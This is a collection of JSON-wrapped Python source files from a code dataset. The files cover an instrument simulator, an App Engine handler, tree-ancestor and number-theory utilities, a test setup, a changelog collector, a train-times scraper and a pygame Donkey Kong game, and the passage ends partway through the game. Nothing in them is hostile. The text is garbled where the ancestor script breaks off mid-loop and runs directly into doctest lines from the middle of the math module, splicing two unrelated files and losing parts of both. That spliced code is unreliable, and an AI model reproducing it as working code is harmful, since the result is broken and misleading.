+{"seq_id":"460085032","text":"# -*- coding: utf-8 -*-\nfrom threading import Thread, activeCount\nfrom time import sleep\nimport logging\nimport queue\n\nimport sim_fungen\nimport sim_voltmeter\nimport sim_instrument\n\n\nclass StudiedObject(object):\n def __init__(self, read_from_actuator):\n self.read = read_from_actuator\n self.memory = queue.Queue()\n self._present_value = 0\n\n def action(self):\n in_value = self.read()\n self.memory.put(in_value)\n if self.memory.empty() or self.memory.qsize()<10:\n self._present_value = 0\n else:\n self._present_value = 0.5*self.memory.get()\n\n def present_value(self):\n return self._present_value\n\n\nclass Namespace():\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\ndef create_actuator_server(actuator):\n logging.info('Creating fungen server')\n args = Namespace('localhost', 5678)\n actuator_server = sim_instrument.main_tcp(actuator, args)\n logging.info('Fungen: interrupt the program with Ctrl-C')\n try:\n actuator_server.serve_forever()\n except KeyboardInterrupt:\n logging.info('Fungen: Ending')\n finally:\n actuator_server.shutdown()\n\ndef create_sensor_server(sensor):\n logging.info('Creating voltmeter server')\n args = Namespace('localhost', 5679)\n sensor_server = sim_instrument.main_tcp(sensor, args)\n logging.info('Voltmeter: interrupt the program with Ctrl-C')\n try:\n sensor_server.serve_forever()\n except KeyboardInterrupt:\n logging.info('Voltmeter: Ending')\n finally:\n sensor_server.shutdown()\n\ndef serve_forever():\n try:\n while activeCount() == 3:\n obj.action()\n sleep(0.1)\n except KeyboardInterrupt:\n logging.info('Experiment: Ending.')\n\nif __name__ == \"__main__\":\n fungen = sim_fungen.SimFunctionGenerator()\n obj = StudiedObject(fungen.generator_output)\n voltmeter = sim_voltmeter.SimVoltmeter(obj.present_value, fungen.generator_output)\n fthread = Thread(target=create_actuator_server, args=(fungen, ))\n vthread = Thread(target=create_sensor_server, args=(voltmeter, ))\n fthread.daemon = True\n vthread.daemon = True\n fthread.start()\n vthread.start()\n\n sleep(1)\n serve_forever()\n","sub_path":"examples/example_simulators/sim_experiment.py","file_name":"sim_experiment.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"528384636","text":"#encoding:utf-8\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.webapp.util import run_wsgi_app\r\nfrom google.appengine.ext.webapp import template\r\nfrom basetypes import *\r\nimport os,datetime,logging\r\n \r\nclass Frame(webapp.RequestHandler):\r\n def get(self):\r\n tablist = [\r\n {\r\n 'destination' : '/main?ajax',\r\n 'icon' : 'main',\r\n 'tooltip' : ' 主界面 '\r\n },\r\n {\r\n 'destination' : '/stat?ajax',\r\n 'icon' : 'stat',\r\n 'tooltip' : '统计信息'\r\n },\r\n {\r\n 'destination' : '/show?ajax',\r\n 'icon' : 'show',\r\n 'tooltip' : '查看数据'\r\n },\r\n {\r\n 'destination' : '/add?ajax',\r\n 'icon' : 'add',\r\n 'tooltip' : '添加数据'\r\n },\r\n ]\r\n #----generate parameter list----------------------------------------------------------------------\r\n template_values = {\r\n 'tablist' : tablist\r\n }\r\n path = os.path.join(os.path.dirname(__file__), './/template//frame.html')\r\n #----end------------------------------------------------------------------------------------------\r\n self.response.out.write(template.render(path,template_values))\r\n\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([(r'/.*', Frame)],debug=True)\r\n run_wsgi_app(application)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"InfoRecorderOnline/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"590886717","text":"import json\n\nf = open(\"org.json\").read()\nf=f.replace(\"\\n\",\"\")\ndata = json.loads(f)\nparent={}\nlevel={}\nn=len(data)\nfor i in range(1,n):\n\tfor j in data['L'+str(i)]:\n\t\tlevel[j['name']]=i\n\t\tparent[j['name']]=j['parent']\nparent[data['L0'][0]['name']]='-1'\nlevel[data['L0'][0]['name']]=0\n#print(parent)\n#print(level)\n\nroot=data['L0'][0]['name']\na=input()\nb=input()\naa=a\nbb=b\n\nif(root==a or root==b):\n\tprint(\"NO LEADER\")\n\texit()\naa=[]\nbb=[]\naa.insert(0,a)\naa.insert(0,b)\nwhile(parent[a]!=\"-1\"):\n\taa.insert(0,parent[a])\n\t#aa=parent[a]+aa\n\ta=parent[a]\n\nwhile(parent[b]!=\"-1\"):\n\tbb.insert(0,parent[b])\n\t#aa=parent[a]+aa\n\tb=parent[b]\n\nlca=aa[0]\n#print(aa)\n#print(bb)\ni=0\nj=0\nn=len(aa)\nm=len(bb)\nwhile(i>> gcd(1989, 867)\n 51\n \n \"\"\"\n\n # Make sure b is the smaller.\n if a < b:\n a,b = b,a\n\n if b <= 0:\n raise Exception(\"Written for postive numbers\")\n\n # perform the euclid's algorithm\n # http://en.wikipedia.org/wiki/Euclidean_algorithm\n while b != 0:\n a, b = b, a % b\n\n return a\n\n\ndef lcm(a, b):\n \"\"\"Least common multiplier\n\n >>> lcm(1769, 551)\n 33611\n \n \"\"\"\n\n d = gcd(a, b)\n return (a / d) * b\n\n\n\ndef sieve(N):\n \"\"\"Find the primes less than N\n\n Use the sieve of eratosthenes to find prime numbers.\n Could be a lot better, but for reasonable N's, it works\n ok.\n\n >>> sieve(10)\n [2, 3, 5, 7]\n \"\"\"\n\n # Create a list of potential primes. We can drop all the\n # even numbers, because we know that they aren't going to\n # to prime (except 2). We have to account for that later,\n # but it saves half the memory, and half the checking.\n ar = range(1,N,2)\n\n M = len(ar)\n\n # Check each entry in the array in order. If the entry\n # is not marked off, it is prime. When we find a prime,\n # remove its multiples from the rest of the list.\n for d in xrange(1,int(1+(sqrt(N) + 1)/2)):\n if ar[d] == 0:\n continue # not prime\n p = ar[d]\n # got the prime. Now, mark off its multiples.\n # \n # ar[i] = 2 * i - 1\n # if p is odd :\n # d = (p - 1) / 2\n # => d * (1 + p) =\n # = (p - 1) / 2 * (1 + p)\n # = (p^2 - 1) / 2\n # ar[(p^2 - 1) / 2] = p^2\n # so, d * (1+p) is the index of p^2. And, we can step out p\n # at a time because even numbers are skipped.\n for j in xrange(d * (1+p), M, p):\n ar[j] = 0\n\n # 2 was never in the results, so put it back in the front.\n ar[0] = 2\n\n # return the non-zeros\n return [x for x in ar if x]\n\n\ndef prime_factor(N):\n \"\"\"Find a prime factor for each number \n\n Use the sieve of eratosthenes to find the largest\n prime factor of each number up to N-1.\n\n >>> prime_factor(20)\n [0, 0, 1, 1, 2, 1, 3, 1, 2, 3, 5, 1, 3, 1, 7, 5, 2, 1, 3, 1]\n\n \"\"\"\n\n # For simplicity, this does all numbers, not just\n # odd.\n\n\n ar = [1] * N \n ar[0], ar[1] = 0, 0\n \n # Check each entry in the array in order. If the entry\n # is not marked off, it is prime. 
When we find a prime,\n # remove its multiples from the rest of the list.\n for d in xrange(1,N/2+2):\n if ar[d] == 1:\n # Prime!\n for j in xrange(2*d, N, d):\n ar[j] = d\n return ar\n\ndef factorize(x, factors):\n \"\"\"Find the prime factorization of x\n\n FACTORS is the result of calling prime_factor with N > x.\n This function finds all of the prime factors of x, and their\n powers.\n\n >>> factors = prime_factor(201)\n >>> factorize(200, factors)\n [(5, 2), (2, 3)]\n \n \"\"\"\n result = []\n\n while x > 1:\n p = factors[x]\n if p == 1:\n p = x\n c = 0\n while x % p == 0:\n c += 1\n x /= p\n result.append((p, c))\n return result\n\ndef extended_euclid(m, n):\n \"\"\"Euclid's algorithm, extended to solve a*m + b*n = d\n\n Returns (a, b, d) given m,n. Assumes m,n > 0\n \n Algorithm E, Art of Computer Programming, Chapter 1\n\n >>> extended_euclid(1769, 551)\n (5, -16, 29)\n\n\n \"\"\"\n\n # At top top of each loop, gcd(c,d) == gcd(m, n), and\n # a * m + b * n == d\n\n a, ap = 0, 1\n b, bp = 1, 0\n c = m\n d = n\n while True:\n q = c / d\n r = c - d * q\n if r == 0:\n return a, b, d\n c,d = d, r\n ap, a = a, ap - q * a\n bp, b = b, bp - q * b\n\n\nif __name__ == \"__main__\":\n # Run the doctests as a smoke test.\n import doctest\n doctest.testmod()\n\n \n\n","sub_path":"my_math.py","file_name":"my_math.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
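Because extended_euclid returns (a, b, d) with a*m + b*n = d, it yields modular inverses whenever gcd(m, n) = 1: a is then the inverse of m modulo n. A small worked sketch (note the module is Python 2, as the xrange calls and integer division show):

# Modular inverse via extended_euclid: -5*17 + 2*43 == 1, so
# the inverse of 17 mod 43 is -5 % 43 == 38.
a, b, d = extended_euclid(17, 43)
assert d == 1
inv = a % 43
print(inv)                    # 38
assert (17 * inv) % 43 == 1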
+{"seq_id":"388311464","text":"import os\nimport sys\nimport tempfile\nimport unittest\nfrom epitome.models import *\nfrom epitome.dataset import *\n\n# set Epitome data path to test data files for testing\n# this data was saved using functions.saveToyData(/epitome/test/daata)\ndir_path = os.path.dirname(os.path.realpath(__file__))\nos.environ[\"EPITOME_DATA_PATH\"] = os.path.abspath(os.path.join(dir_path, \"data\",\"test\"))\n\nS3_TEST_PATH = 'https://epitome-data.s3-us-west-1.amazonaws.com/test.zip'\n\nclass EpitomeTestCase(unittest.TestCase):\n\n\tdef __init__(self, *args, **kwargs):\n\t\t# download test data to parent dir of EPITOME_DATA_PATH if it was not yet downloaded\n\t\tdownload_and_unzip(S3_TEST_PATH, os.path.dirname(os.environ[\"EPITOME_DATA_PATH\"]))\n\t\tsuper(EpitomeTestCase, self).__init__(*args, **kwargs)\n\n\tdef getFeatureData(self,\n\t\t\t\t\ttargets,\n\t\t\t\t\tcells,\n\t\t\t\t\tsimilarity_targets = ['DNase'],\n\t\t\t\t\tmin_cells_per_target = 3,\n\t\t\t\t\tmin_targets_per_cell = 1):\n\n\t\t# returns matrix, cellmap, assaymap\n\t\treturn EpitomeDataset.get_assays(\n\t\t\t\ttargets = targets,\n\t\t\t\tcells = cells,\n\t\t\t\tsimilarity_targets = similarity_targets,\n\t\t\t\tmin_cells_per_target = min_cells_per_target,\n\t\t\t\tmin_targets_per_cell = min_targets_per_cell)\n\n\tdef makeSmallModel(self):\n\t\teligible_cells = ['K562','HepG2','H1','A549','HeLa-S3']\n\t\teligible_targets = ['DNase','CTCF']\n\n\t\tdataset = EpitomeDataset(targets = eligible_targets,\n\t\t\tcells = eligible_cells)\n\n\n\t\treturn EpitomeModel(dataset,\n\t\t\ttest_celltypes = ['K562'])\n\n\n\tdef tmpFile(self):\n\t\ttempFile = tempfile.NamedTemporaryFile(delete=True)\n\t\ttempFile.close()\n\t\treturn tempFile.name\n","sub_path":"epitome/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"216728644","text":"from kinbot.reac_General import GeneralReac\n\n\nclass CpdHMigration(GeneralReac):\n max_step = 14\n scan = 0\n skip = 1\n \n\n def get_constraints(self, step, geom):\n fix = []\n change = []\n release = []\n if step < self.max_step:\n fix_bonds(fix)\n\n if step == 0:\n self.set_angle_single(-2, -1, 0, 70., change)\n\n if step == 1:\n fval = 1.35\n self.set_bond(-2, -1, fval, change)\n self.set_bond(0, -1, fval, change)\n \n self.clean_constraints(change, fix)\n\n return step, fix, change, release\n","sub_path":"kinbot/reac_cpd_H_migration.py","file_name":"reac_cpd_H_migration.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"420294976","text":"#!/usr/bin/env python3\nfrom lxml import etree as ET\nimport requests\nimport stations\n\nr = requests.get(\n 'http://iris2.rail.co.uk/tiger/{}.xml'.format(stations.iris_id))\nroot = ET.XML(r.content)\n\n\ndef find_train_with_destination(station):\n return root.findall(\"./Service/Destination1[@crs='{}']..\".format(station))\n\n\ndef find_train_with_origin(station):\n return root.findall(\"./Service/Origin1[@crs='{}']..\".format(station))\n\n\ndeparting_services = sum(\n map(find_train_with_destination, stations.departing_train_end_point), [])\n\ndepartDict = dict(\n [\n (i,\n {\n \"departTime\": s.find('DepartTime').get('time'),\n \"delay\": s.find('ServiceStatus').get('status') == 'Delayed',\n \"delayMins\": s.find('Delay').get('Minutes'),\n \"destinationArriveTime\": s.findall(\n \"./Dest1CallingPoints/CallingPoint[@crs='{}']\".format(\n stations.destination))[0].get('etarr')}) for i,\n s in enumerate(departing_services)])\n\narriving_services = sum(\n map(find_train_with_origin, stations.arriving_train_start_point), [])\n\narriveDict = dict([(i,\n {\"arriveTime\": s.find('ArriveTime').get('time'),\n \"delay\": s.find('ServiceStatus').get('status') == 'Delayed',\n \"delayMins\": s.find('Delay').get('Minutes'),\n \"expectedArriveTime\": s.find('ExpectedArriveStatus').get('time')\n }) for i, s in enumerate(arriving_services)])\n\nprint(arriveDict)\nprint(departDict)\n","sub_path":"train-time.py","file_name":"train-time.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"411629669","text":"#!/usr/local/bin/python\n\"\"\"\n Copyright (c) 2020 Ad Schellevis \n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport os\nimport argparse\nimport requests\nimport zipfile\nimport collections\nimport re\nfrom packaging import version\nfrom jinja2 import Template\n\ndef download_zip(target_filename):\n req = requests.get(\"https://github.com/opnsense/changelog/archive/master.zip\", stream=True)\n if req.status_code == 200:\n req.raw.decode_content = True\n with open(target_filename, 'wb') as f_out:\n while True:\n data = req.raw.read(10240)\n if not data:\n break\n else:\n f_out.write(data)\n\ndef parse_change_log(payload, this_version):\n result = {\n \"release_date\": \"---\",\n \"prelude\": list(),\n \"content\": list()\n }\n all_tokens = set()\n all_token_links = dict()\n first_line = False\n prelude_line = this_version.count(\".\") == 1\n rst_content = list()\n lines = payload.split(\"\\n\")\n for idx, line in enumerate(lines):\n content_line = None\n # general cleanups\n line = line.replace('*', '\\*')\n if line.find('`') > -1:\n line = re.sub(r'(`)([^`|\\']*)([`|\\'])', r':code:`\\2`', line)\n #\n for token in re.findall(r'(\\[[0-9]{1,2}\\])', line):\n all_tokens.add(token)\n if idx < 3 and line.find('@') > -1:\n result[\"release_date\"] = line.split('@')[1].strip()\n elif first_line is False and line.strip() != \"\":\n # strip tag line\n first_line = idx\n if line.find('OPNsense') > -1:\n content_line = line\n elif line == '--':\n # chop tagine\n del result['content'][-3:]\n elif line.startswith('o '):\n content_line = \"*%s\" % line[1:] # bullet list\n elif line.startswith('# '):\n # literal (code) block\n if not lines[idx-1].startswith('# '):\n content_line = \".. 
code-block::\\n\\n %s\" % line\n else:\n content_line = \" %s\" % line\n elif line.startswith('[') and line[0:line.find(']')+1] in all_tokens:\n token = line[0:line.find(']')+1]\n all_token_links[token] = line[len(token)+1:].strip()\n else:\n content_line = line\n\n if content_line is not None:\n result['content'].append(content_line)\n if prelude_line:\n result['prelude'].append(content_line)\n\n # prelude exit\n if prelude_line and line.find('https://opnsense.org/download/') > -1:\n prelude_line = False\n\n result[\"content\"] = \"\\n\".join(result[\"content\"])\n result[\"prelude\"] = \"\\n\".join(result[\"prelude\"])\n # replace links\n for section in ['content', 'prelude']:\n for token in all_token_links:\n result[section] = result[section].replace(token, \" `%s <%s>`__ \" % (token, all_token_links[token]))\n return result\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--skip_download', help='skip downloading github rep', action='store_true')\n cmd_args = parser.parse_args()\n\n root_dir = os.path.dirname(os.path.abspath(__file__))\n changelog_zip = \"%s/changelog_github.zip\" % root_dir\n if not cmd_args.skip_download:\n download_zip(changelog_zip)\n\n if os.path.isfile(changelog_zip):\n template_data = {\n 'major_versions': collections.OrderedDict(),\n 'versions': collections.OrderedDict(),\n 'nicknames': collections.OrderedDict(),\n }\n all_versions = dict()\n # read all changelogs (from zip)\n with zipfile.ZipFile(changelog_zip, mode='r', compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n fparts = item.filename.split('/')\n if len(fparts) > 3 and fparts[1] == 'doc' and item.file_size > 0:\n all_versions[fparts[3]] = zf.open(item).read().decode()\n\n for my_version in sorted(all_versions, key=lambda x: version.Version(x.replace('.r','rc')), reverse=True):\n major_version = \".\".join(my_version.split('.')[:2])\n if major_version not in template_data['major_versions']:\n template_data['major_versions'][major_version] = dict()\n template_data['versions'][my_version] = parse_change_log(all_versions[my_version], my_version)\n\n if major_version == my_version:\n template_data['nicknames'][my_version] = \"\"\n tmp = all_versions[my_version].replace('\\n', ' ')\n m = re.match(r'.*nicknamed [\"\\'](?P[^\"\\']+)', tmp)\n if m:\n template_data['nicknames'][my_version] = m.groupdict()['nickname']\n\n # root menu index\n with open(\"%s/source/releases.rst\" % root_dir, 'w') as f_out:\n template = Template(open(\"%s/source/releases.rst.in\" % root_dir, \"r\").read())\n f_out.write(template.render(template_data))\n\n # per version rst file\n template = Template(open(\"%s/source/releases/default.rst.in\" % root_dir, \"r\").read())\n for major_version in template_data['major_versions']:\n if major_version in template_data['versions']:\n # wait for the main version before writing a changelog\n with open(\"%s/source/releases/%s.rst\" % (root_dir, major_version), 'w') as f_out:\n template_data['this_version'] = major_version\n f_out.write(template.render(template_data))\n","sub_path":"collect_changelogs.py","file_name":"collect_changelogs.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
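parse_change_log expects a plain-text changelog with a "version @ date" header, an OPNsense tag line, "o "-style bullets, and trailing "[n] url" link definitions, which it rewrites into reStructuredText. An illustrative call on a made-up payload (the commit URLs are placeholders):

# Toy payload shaped like the changelogs the parser consumes.
payload = "\n".join([
    "21.1.1 @ January 28, 2021",
    "OPNsense 21.1.1 released",
    "",
    "o system: fix a typo [1]",
    "o firewall: new alias type [2]",
    "",
    "[1] https://github.com/opnsense/core/commit/0000000",
    "[2] https://github.com/opnsense/core/commit/1111111",
])
parsed = parse_change_log(payload, "21.1.1")
print(parsed["release_date"])  # January 28, 2021
print(parsed["content"])       # bullets become RST; [1]/[2] become inline links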
+{"seq_id":"634011489","text":"import matplotlib.pyplot as plt\n\nfrom die import Die\n\n\ncount = 100\ndies = [Die(), Die()]\nnum = 1\n\ndef roll_all(dies):\n \"\"\"所有骰子掷一次相加结果\"\"\"\n result = 1\n for die in dies:\n result *= die.roll()\n return result\n\ndef max_result(dies):\n \"\"\"最大值\"\"\"\n result = 1\n for die in dies:\n result *= die.num_sides\n return result\n\n#掷几次骰子,将结果存放在一个列表中\nresults = [roll_all(dies) for n in range(count)]\n\nfrequencies = [results.count(v) for v in range(1, len(results) + 1)]\n\nprint(len(results))\nprint(len(frequencies))\n\n#matplotlib直方图\n#...\n","sub_path":"PythonCrashCourse/chapter15/15_10.py","file_name":"15_10.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"5890074","text":"#!/usr/bin/env python\n#######################################\n# Author : Dhruv Khattar #\n#####################################\n\n\"\"\" Importing libararies \"\"\"\nimport pygame\nimport os\nimport sys\nimport time\nimport random\n\n\"\"\" Importing Modules \"\"\"\nimport Person\nimport Player\nimport Donkey\nimport Board\nimport Fireball\n\n\"\"\"Declaring Screen Dimensions \"\"\"\nWIDTH = 1350\nHEIGHT = 780\nBLOCK = 30\n\nclass Game(object):\n \"\"\" This class represents an instance of the game. \"\"\"\n \"\"\"If we want to restart the game , then we just need to create a new instance of this class. \"\"\"\n \n def __init__(self,score,lives,level):\n \"\"\" Constructor Function: called automatically when an instance of the class is created \"\"\"\n \n \"\"\"Creating Player \"\"\"\n self.player = Player.Player()\n \n \"\"\" Creating a List for Donkey and Fireballs\"\"\"\n self.fireball_sprites = pygame.sprite.Group()\n\n \"\"\" Declaring Current Level \"\"\"\n self.current_level = Board.Board(self.player)\n\n \"\"\" Creating various Sprite Groups \"\"\"\n self.moving_sprites = pygame.sprite.Group()\n self.donkey_sprites = pygame.sprite.Group()\n self.player.level = self.current_level\n\n \"\"\" Player's initial Location \"\"\"\n self.player.rect.x = 30\n self.player.rect.y = HEIGHT - self.player.rect.height-30\n \n \"\"\"Adding Player in moving_sprites to make updates easy\"\"\"\n self.moving_sprites.add(self.player)\n\n \"\"\" List that contains random numbers for turning Donkey \"\"\"\n self.donkeyturn = []\n\n \"\"\" Creating Donkey and adding it to lists \"\"\"\n for i in range(0,level):\n donkey = Donkey.Donkey()\n \n \"\"\"Donkey's initial Location\"\"\"\n donkey.rect.x = 30+30*i\n donkey.rect.y = 120\n \n \"\"\"Adding Donkey in various lists\"\"\"\n self.donkey_sprites.add(donkey)\n self.donkeyturn.append(random.randint(100,200))\n self.moving_sprites.add(donkey)\n \n \"\"\" For restarting and respawing \"\"\"\n self.game_over = False\n self.game_win = False\n\n \"\"\" Score Lives Level \"\"\"\n self.level = level\n self.score = score\n self.lives = lives\n\n \"\"\" Flag to check when 'a' or 's' is pressed \"\"\"\n self.flag = 0\n\n \"\"\" Counter to randomize things \"\"\"\n self.counter = 0\n\n\n def checkCollision(self):\n \"\"\" Checks Collision netween Player and fireball_sprites \"\"\"\n\n \"\"\" Checking if Fireball hits Player\"\"\"\n kill_hit = pygame.sprite.spritecollide(self.player,self.fireball_sprites,True)\n if len(kill_hit) > 0:\n \"\"\" Lost a Life \"\"\"\n self.ouch_sound.play()\n self.game_over = True\n \n \"\"\" Checking if Donkey hits Player\"\"\"\n donkey_hit = pygame.sprite.spritecollide(self.player,self.donkey_sprites,True)\n if len(donkey_hit) > 0:\n \"\"\" Ending Game \"\"\"\n self.gameover_sound.play()\n self.game_over = True\n self.lives = 1\n\n\n def collectCoin(self):\n \"\"\" Checks if Player collects a coin and increases the score by 5\"\"\"\n\n coins_hit = pygame.sprite.spritecollide(self.player,self.player.level.coins,True)\n if len(coins_hit) > 0:\n self.score += len(coins_hit)*5\n self.coin_sound.play()\n\n \n def collectLife(self):\n \"\"\" Checks if Player collects a heart and gains a life\"\"\"\n\n hearts_hit = pygame.sprite.spritecollide(self.player,self.player.level.life,True)\n if len(hearts_hit) > 0:\n self.lives += 1\n self.extralife_sound.play()\n\n \n def checkWin(self):\n \"\"\" Checks if the Player has saved the Queen \"\"\"\n\n queen_hit = 
pygame.sprite.spritecollide(self.player,self.player.level.queen, True)\n\n        if len(queen_hit) > 0:\n            \"\"\"Player wins the Game\"\"\"\n            self.game_win = True\n            self.win_sound.play()\n\n\n    def editFireball(self):\n        \"\"\" Creates and Destroys Fireballs\"\"\"\n\n        \"\"\" Removing Fireballs when they reach the Player's spawn position \"\"\"\n        for fireball in self.fireball_sprites:\n            if fireball.rect.y == HEIGHT - 60 and fireball.rect.x < 45:\n                self.fireball_sprites.remove(fireball)\n                self.moving_sprites.remove(fireball)\n\n        \"\"\" Counter to randomize Fireballs produced by Donkey\"\"\"\n        if self.counter%200 == 0:\n\n            for donkey in self.donkey_sprites:\n\n                \"\"\" Creating a new Fireball\"\"\"\n                self.fireball = Fireball.Fireball()\n\n                \"\"\" Setting the initial Fireball coordinates to Donkey's coordinates\"\"\"\n                self.fireball.rect.x = donkey.rect.x\n                self.fireball.rect.y = donkey.rect.y\n                self.fireball.level = self.current_level\n\n                \"\"\"Setting Fireball's initial vector\"\"\"\n                if donkey.change_x > 0:\n                    self.fireball.change_x = 4\n                else:\n                    self.fireball.change_x = -4\n\n                \"\"\" Adding Fireball to moving_sprites and fireball_sprites\"\"\"\n                self.moving_sprites.add(self.fireball)\n                self.fireball_sprites.add(self.fireball)\n\n\n    def turnDonkey(self):\n        \"\"\" Function that turns Donkey randomly \"\"\"\n\n        i = 0\n        for donkey in self.donkey_sprites:\n            if self.counter%self.donkeyturn[i] == 0:\n                donkey.change_x *= -1\n                self.donkeyturn[i] = random.randint(100,200)\n            i += 1\n\n\n    def process_Events(self):\n        \"\"\" Processes all the events and returns True if the game needs to quit \"\"\"\n\n        for event in pygame.event.get():\n            \"\"\" If Window's closed\"\"\"\n            if event.type == pygame.QUIT:\n                return True\n\n            \"\"\" If a key is pressed\"\"\"\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_q:\n                    return True\n                if event.key == pygame.K_a:\n                    self.player.goLeft()\n                if event.key == pygame.K_d:\n                    self.player.goRight()\n                if event.key == pygame.K_w:\n                    self.flag = 1\n                    self.player.goUp()\n                if event.key == pygame.K_s:\n                    self.flag = 1\n                    self.player.goDown()\n                if event.key == pygame.K_SPACE:\n                    self.player.jump()\n                if event.key == pygame.K_c:\n                    if self.game_over and self.lives==1:\n                        self.__init__(0,3,1)\n                if event.key == pygame.K_RETURN:\n                    if self.game_win:\n                        self.__init__(self.score+50,self.lives,self.level+1)\n\n            \"\"\" If a key is released\"\"\"\n            if event.type == pygame.KEYUP:\n                if event.key == pygame.K_a and self.player.change_x < 0:\n                    self.player.stopX()\n                if event.key == pygame.K_d and self.player.change_x > 0:\n                    self.player.stopX()\n                if event.key == pygame.K_w:\n                    self.flag = 0\n                    self.player.stopY()\n                if event.key == pygame.K_s:\n                    self.flag = 0\n                    self.player.stopY()\n\n        return False\n\n\n    def respawn(self):\n        \"\"\" Respawns Player in the bottom left corner \"\"\"\n        self.game_over = False\n        self.score -= 25\n        self.lives -= 1\n        self.player.rect.x = BLOCK\n        self.player.rect.y = HEIGHT - 2*BLOCK\n\n\n    def updateSprites(self):\n        \"\"\"Updates various Sprites\"\"\"\n        self.moving_sprites.update(self.flag)\n\n\n    def drawFrame(self,screen):\n        \"\"\"Draws the Screen\"\"\"\n\n        if self.game_win:\n            font = pygame.font.Font(None,100)\n            text1 = font.render(\"YOU WIN \", 1 , (0,0,0))\n            text2 = font.render(\"Press ENTER to continue\", 1 , (0,0,0))\n            textpos1 = text1.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-50)\n            textpos2 = text2.get_rect(centerx=WIDTH/2,centery=HEIGHT/2+50)\n            screen.blit(text1,textpos1)\n            screen.blit(text2,textpos2)\n        elif not self.game_over:\n            self.current_level.draw(screen)\n            self.moving_sprites.draw(screen)\n            font = pygame.font.Font(None,36)\n            text = font.render(\"SCORE: %s LIVES: %s LEVEL: %s\" % (self.score ,self.lives,self.level), 1 , (0,0,0))\n            screen.blit(text,[0,HEIGHT-30])\n        else:\n            font = pygame.font.Font(None,100)\n            if self.lives > 1:\n                text = font.render(\"LIVES LEFT: %s \" % (self.lives - 1) , 1 , (0,0,0))\n                self.respawn()\n                textpos = text.get_rect(centerx=WIDTH/2,centery=HEIGHT/2)\n                screen.blit(text,textpos)\n                pygame.display.flip()\n                time.sleep(0.5)\n            else:\n                back = pygame.image.load(\"images/DKback.jpg\")\n                screen.blit(back,(0,0))\n                text1 = font.render(\"YOU LOSE \" , 1 , (0,0,0))\n                text2 = font.render(\"SCORE : %s\" % self.score , 1 , (0,0,0))\n                text3 = font.render(\"Press C to Restart\" , 1 , (0,0,0))\n                textpos1 = text1.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-100)\n                textpos2 = text2.get_rect(centerx=WIDTH/2,centery=HEIGHT/2)\n                textpos3 = text3.get_rect(centerx=WIDTH/2,centery=HEIGHT/2+100)\n                screen.blit(text1,textpos1)\n                screen.blit(text2,textpos2)\n                screen.blit(text3,textpos3)\n\n        \"\"\" Updating the screen i.e. Showing the changes done in this iteration \"\"\"\n        pygame.display.flip()\n\n\n\"\"\" Main Program \"\"\"\ndef main():\n    \"\"\" Initializing PyGame \"\"\"\n    pygame.init()\n\n    \"\"\" Initializing Screen \"\"\"\n    screen = pygame.display.set_mode((WIDTH,HEIGHT))\n\n    \"\"\" Setting Title of the Game\"\"\"\n    pygame.display.set_caption(\"Donkey Kong\")\n\n    \"\"\" FPS \"\"\"\n    clock = pygame.time.Clock()\n\n    \"\"\" Flag to check if Game is closed\"\"\"\n    done = False\n\n    \"\"\" Adding intro sound \"\"\"\n    intro = pygame.mixer.Sound(\"sounds/intro.wav\")\n    intro.play()\n\n    \"\"\" Printing Rules of the Game \"\"\"\n    font = pygame.font.Font(None,70)\n    font.set_bold(True)\n\n    title = pygame.font.Font(None,100).render(\" DONKEY KONG \", 1, (0,255,0))\n    name = pygame.font.Font(None , 40).render(\"created by : Dhruv Khattar\", 1, (0,255,0))\n    rule = font.render(\" Rules \", 1 , (0,0,0))\n    rule1 = font.render(\" - To win the 